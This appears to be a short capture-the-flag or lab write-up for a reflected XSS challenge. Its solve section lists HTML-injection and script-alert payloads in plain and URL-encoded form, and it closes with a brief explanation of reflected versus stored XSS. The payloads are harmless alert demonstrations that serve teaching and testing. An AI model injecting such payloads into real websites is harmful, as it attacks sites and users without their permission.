# Solve

- Using this payload to prompt an XSS payload

```bash
# Normal
'); <u>HTML Injection</u>; //
'); <script>alert('XSS')</script>; //
<script>alert('XSS')</script>
---
# URL Encoded
%27%29%3B%20%3Cu%3EHTML%20Injection%3C%2Fu%3E%3B%20%2F%2F
%27%29%3B%20%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3B%20%2F%2F%20
%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
```

# The vulnerability - Reflected XSS

# XSS Explain

- The vulnerability demonstrated in the previous example is an example of Reflected XSS, which is also known as Non-Persistent XSS.

- Reflected XSS attacks occur when the attacker injects malicious code into a web page that is then reflected back to the user by the server. In this case, the attacker injected a script into the "name" parameter of the URL, which was then inserted into the HTML page using the eval() function. When the user's browser loaded the page, the script was executed, resulting in an unwanted alert being shown to the user.

- The difference between Reflected XSS and Stored XSS (also known as Persistent XSS) is that Reflected XSS attacks are not stored on the server or in a database, but are instead immediately reflected back to the user in the server's response. Stored XSS attacks, on the other hand, are stored in a database or on the server, and are executed whenever the vulnerable web page is loaded.
